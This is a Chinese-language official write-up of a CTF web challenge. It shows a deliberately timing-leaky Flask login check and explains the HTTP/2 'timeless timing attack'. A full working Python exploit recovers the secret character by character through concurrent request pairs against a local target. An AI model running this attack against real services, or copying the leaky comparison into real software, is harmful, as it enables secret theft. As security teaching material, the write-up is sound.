点击此处 获得更好的阅读体验
WriteUp来源
官方WP
题目考点
解题过程
本题是根据WCTF2020的spaceless spacing改编。
题目在80端口仅仅开放了HTTP/2服务,未开放HTTP/1.1 升级的功能,通过浏览器无法直接打开,需要使用无HTTP/1.1 升级的纯HTTP/2请求
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 curl --http2-prior-knowledge IP/ <!DOCTYPE html > <html lang ="en" > <head > <meta charset ="UTF-8" > <title > Login</title > <link rel ="stylesheet" type ="text/css" href ="/static/login.css" /> </head > <body > <div id ="login" > <h1 > Login</h1 > <form method ="post" > <input type ="password" required ="required" placeholder ="口令" name ="secret" > </input > <button class ="but" type ="submit" > 登录</button > </form > </div > </body > </html >
访问后是一个登录界面,提示了/src,访问后得到源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 import osimport timeimport hashlibfrom flask import Flask, render_template, requestapp = Flask(__name__) FLAG = os.environ["ICQ_FLAG" ] SECRET = hashlib.sha1(FLAG.encode()).hexdigest()[:10 ] + "test" SLEEP_TIME = 10 ** -3 @app.route("/", methods=['POST', 'GET']) def login () : if request.method == 'GET' : return render_template('login.html' ) else : secret = request.form['secret' ] if len(secret) != len(SECRET): return "^_^" for a, b in zip(secret, SECRET): if a == "*" : continue elif a != b: return "INCORRECT" else : time.sleep(SLEEP_TIME) if "*" in secret: return "INCORRECT" return FLAG @app.route("/src") def src () : with open(__file__) as f: return f.read()
后端首先计算flag值sha1的前10个字符,并在结尾处添加"test"作为SECRET值,登录接口会逐位将SECRET与传入的secret作比较,若某一位不相同则返回INCORRECT,若这一位是"*"则跳过,若这一位相同则sleep 1毫秒,若判断至最后存在"*"则返回INCORRECT,全部正确则返回flag。
HTTP/2支持单一长连接,一个TCP连接可以发送多个请求,2020年一篇发表在顶会USENIX的文章 Timeless Timing Attacks: Exploiting Concurrency to Leak Secrets over Remote Connections 介绍了一种叫做Timeless Timing Attack的攻击,大致意思就是将两个请求的请求尾封装在同一个TCP包中,保证它们同时到达服务器,通过判断哪个响应先返回来判断是否发生了sleep。作者在github上公开了该攻击的利用脚本:https://github.com/DistriNet/timeless-timing-attacks。
跑flag时可以从后向前跑,这样最前面的一位如果错误将不会sleep,而如果正确将sleep 多次。
exp如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 import osimport asyncioimport timeimport stringimport loggingfrom hyper import HTTP20Connectionfrom h2time import H2Time, H2RequestTIMING_ITERATIONS = 2 NUM_REQUEST_PAIRS = 10 SECRET_CHARSET = string.ascii_lowercase + string.digits COMPARISON_CHAR = "@" target = 'http://localhost:8803' logging.basicConfig(level=logging.INFO) logger = logging.getLogger("exploit" ) def get (resource) : logging.disable(logging.INFO) try : connection = HTTP20Connection(target.lstrip("http://" ).lstrip("https://" )) connection.request("POST" , "/" , body=f"secret={resource} " , headers={'Content-Type' : 'application/x-www-form-urlencoded' }) return connection.get_response().read() finally : logging.disable(logging.DEBUG) async def time_difference (a, b) : request_a = H2Request("POST" , f"{target} /" , {"user-agent" : "h2time/0.1" , 'Content-Type' : 'application/x-www-form-urlencoded' }, f"secret={a} " ) request_b = H2Request("POST" , f"{target} /" , {"user-agent" : "h2time/0.1" , 'Content-Type' : 'application/x-www-form-urlencoded' }, f"secret={b} " ) a_quicker_count = 0 b_quicker_count = 0 for _ in range(TIMING_ITERATIONS): async with H2Time( request_a, request_b, num_request_pairs=NUM_REQUEST_PAIRS ) as h2t: results = await h2t.run_attack() b_quicker_count += len([result for result in results if result[0 ] < 0 ]) a_quicker_count += len([result for result in results if result[0 ] >= 0 ]) async with H2Time( request_b, request_a, num_request_pairs=NUM_REQUEST_PAIRS ) as h2t: results = await h2t.run_attack() a_quicker_count += len([result for result in results if result[0 ] < 0 ]) b_quicker_count += len([result for result in results if result[0 ] >= 0 ]) return a_quicker_count, b_quicker_count async def exploit () : secret_length = 1 while get(COMPARISON_CHAR * secret_length) == b"^_^" : secret_length += 1 logger.info("" ) logger.info(f"Secret Length: {secret_length} " ) logger.info("" ) secret = "" for _ in range(secret_length): start = time.time() def spaced_secret_guess (guess) : return "*" * (secret_length - len(secret) - 1 ) + guess + secret tasks = { char: asyncio.create_task( time_difference( spaced_secret_guess(COMPARISON_CHAR), spaced_secret_guess(char) ) ) for char in SECRET_CHARSET } await asyncio.gather(*tasks.values()) lowest_char_quicker = None lowest_char_quicker_count = float("inf" ) for char, task in tasks.items(): comparison_quicker_count, char_quicker_count = task.result() if char_quicker_count < lowest_char_quicker_count: lowest_char_quicker = char lowest_char_quicker_count = char_quicker_count logger.info( f"Tested: {char + secret} -- {comparison_quicker_count} {char_quicker_count} " ) secret = lowest_char_quicker + secret end = time.time() logger.info("" ) logger.info(f"Secret Progress: {secret} " ) logger.info(f"Secret Progress took: {end - start} s" ) logger.info("" ) correct = b"flag" in get(f"{secret} " ) logger.info("" ) logger.info(f"Secret: {secret} " ) logger.info(f"Correct: {correct} " ) logger.info("" ) loop = asyncio.get_event_loop() loop.run_until_complete(exploit()) loop.close()
Flag